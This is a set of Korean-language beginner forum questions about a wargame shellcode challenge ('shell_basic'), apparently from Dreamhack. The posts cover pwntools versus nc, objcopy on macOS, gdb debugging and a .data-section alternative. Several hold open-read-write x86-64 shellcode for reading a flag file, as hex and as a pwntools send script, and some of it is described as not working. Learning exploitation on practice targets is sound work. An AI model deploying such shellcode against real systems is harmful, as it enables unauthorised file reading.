안녕하세요 Pwntools을 사용해서 데이터를 보내서 플래그를 받는데 성공하였습니다. 제가 궁금한 점은 linux상에서 telnet으로 원격접속을 하는 경우와 sendlineafter를 사용해 데이터를 보내는 경우에 무슨 차이가 있는지 궁금합니다. sendlineafter로 보냈을 땐 플래그를 가져오는데 왜 같은 값을 직접 원격접속으로 해서 보낼 땐 값이 안나오는지 알고 싶습니다. image.png 그리고 입력 포맷이 /xff 이 형식이 반복되는데요, /xffff형태라던가 /x를 뺀 형태로 보내면 작동을 안하는 건가요? 해당 형식이 정확이 어떤 자료형태인지도 궁금합니다.

저는 일단 아래의 방법으로 해서 성공했긴했는데 영 아닌거같아서... 댓글대로 void BinaryToShellCode() { ofstream file("shellcode"); string in; while(1) { cin >> in; if (cin.eof()) break; stringstream str(in); string tmp; char binary; while (!str.eof()) { str >> tmp; binary = std::stoi("0x"+ tmp, nullptr, 16); file << binary; } } file.close(); } 보통은 어떻게 쉘코드를 뽑아내나요?

문제에서 알려준대로 objcopy 명령어를 터미널에 치면 커맨드를 사용할 수 없다고나옵니다 zsh: command not found: objcopy 단순하게 맥은 리눅스 기반이니까 명령어 호환이 된다고 생각했는데, 맥은 objcopy를 쓸 수 없나요? 그럼 대체할수있는게 있는지요? (mdfind로 찾으면 아래와 같이 나오길래 된다고 생각했었습니다) mdfind -name objcopy /usr/local/Cellar/binutils/2.41_1/x86_64-apple-darwin21.6.0/bin/objcopy /usr/local/Cellar/binutils/2.41_1/bin/objcopy /usr/local/Cellar/binutils/2.41_1/share/man/man1/objcopy.1 /usr/local/share/dotnet/packs/Microsoft.NET.Runtime.Emscripten.2.0.23.Sdk.osx-x64/6.0.9/tools/bin/llvm-objcopy

처음으로 wargame 접하다보니 길을 좀 잃었습니다. obj.c파일에서 주소를 /home/shell_basic/flag_name_is_loooooong바꾸고 objdump -d사용해서 opcode까지 뽑아냈습니다. 그렇게 뽑은 opcode를 nc host1.dreamhack.games 9349들어가서 shellcode: 에 냅다 붙여넣더니 아무 반응이 없다군요... 어떻게 opcode를 전달해야 하나요? 그리고 shell_basic.c은 어떻게 이용해야 하나요? 작성한 orw.c코드이고 밑에는 objdump -q ./orw 실행후 run_sh함수의 결과입니다... 캡처1.PNG 캡처2.PNG <run_sh>에 있는 기계어만 \x형태로 shellcode:에 전달하면 되는거 아닌가요?

mov rax, 0x676e6f6f6f6f6f6f push rax mov rax, 0x6c5f73695f656d61 push rax mov rax, 0x6e5f67616c662f63 push rax ... 이런식으로 파일 경로를 넣어주었는데 gdb로 나중에 열어보니 파일경로 끝에 \001이 붙어있었습니다... 처음 rsp값이 0x1이었는데 ni로 한줄한줄보니 oooooong\001 -> ame_is_loooooong\001 ->ell_basic/flag_name_is_loooooong\001 이렇게 저장이 되었습니다. 이게 문자열의 끝을 알려주지 않아 그런건가요??

orw를 참조해서 opcode를 뽑았는데... shell_basic에 넣어봤는데 세그멘테이션이 뜹니다... gdb로 어디가 잘못된건지 찾아봤는데 잘모르겠어서요.. 4831c05048b86f6f6f6f6f6f6e675048b8616d655f69735f6c5048b8632f666c61675f6e5048b8656c6c5f626173695048b82f686f6d652f7368504889e04889c7be00000000ba00000000b8020000000f054889c74889e64883ee30ba300000004831c00f05bf01000000b8010000000f054831ffb83c0000000f05

nasm -f elf64 -o orw.o orw.s ld -o orw orw.o 명령어로 어셈블 한 다음에 실행파일 만들고 objdump -d orw로 기계어로 만들었는데 ex) \xf0\xa4 이런형식으로 만들어 쉘코드를 전송하였습니다. 근데 아무 반응이 없는데 뭐가 잘못된건지 잘 모르겠습니다. gdb로 디버깅하여 open rdi에 경로 잘 들어간것도 확인해보고 디버깅했을때 문제는 없는데 뭐가 잘못된걸까요..?

파일 경로를 리틀엔디안으로 8바이트씩 끊어서 push 하는 것 대신 .data 섹션을 이용하는 방법은 없을까요?

xxd를 통해 hex dump까지 진행했습니다. 현재 사진처럼 출력이 되었는데 왼쪽의 hex값들을 그대로 flag값에 넣어주면 안되는 이유가 무엇인가요? 또, 이 부분에 막혀서 다른 분들의 풀이를 참고해 파이썬으로 해결하긴 했지만 혹시 flag값을 직접 구해서 nc 접속 후 flag를 입력해서 해결할 수 있는 방법은 없을까요?? 첫 워게임인데 정말 너무 어렵네요ㅠㅠㅠ

read / write하는 asm 코드를 짠 후 컴파일 후 로컬에서 테스트 해 보니, 해당 경로의 flag값을 읽어와 잘 출력하는 것을 확인하였습니다. 이를 dump를 이용해 run_sh 부분의 코드를 추출하여 아래와 같이 전송하였으나 아무런 결과가 나오지 않습니다. 동일한 방법으로 hello world를 출력하는 shellcode를 전송하였을때에는 잘 동작 하였습니다. (shellcode 전송의 문제는 아는것 같습니다.) p=process('./shell_basic') shellcode = b'\x48\x31\xc0\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x61\x6d\x65\x5f\x69\x50\x48\xb8\x63\x2f\x66\x6c\x61\x50\x48\xb8\x65\x6c\x6c\x5f\x62\x50\x48\xb8\x2f\x68\x6f\x6d\x65\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\xc7\xc0\x02\x00\x00\x00\x0f\x05\x48\x89\xc7\x48\x89\xe6\x48\x83\xee\x30\x48\xc7\xc2\x30\x00\x00\x00\x48\xc7\xc0\x00\x00\x00\x00\x0f\x05\x48\xc7\xc7\x01\x00\x00\x00\x48\xc7\xc0\x01\x00\x00\x00\x0f\x05\x48\x31\xff\x48\xc7\xc0\x3c\x00\x00\x00\x0f\x05' p.send(shellcode) p.interactive() `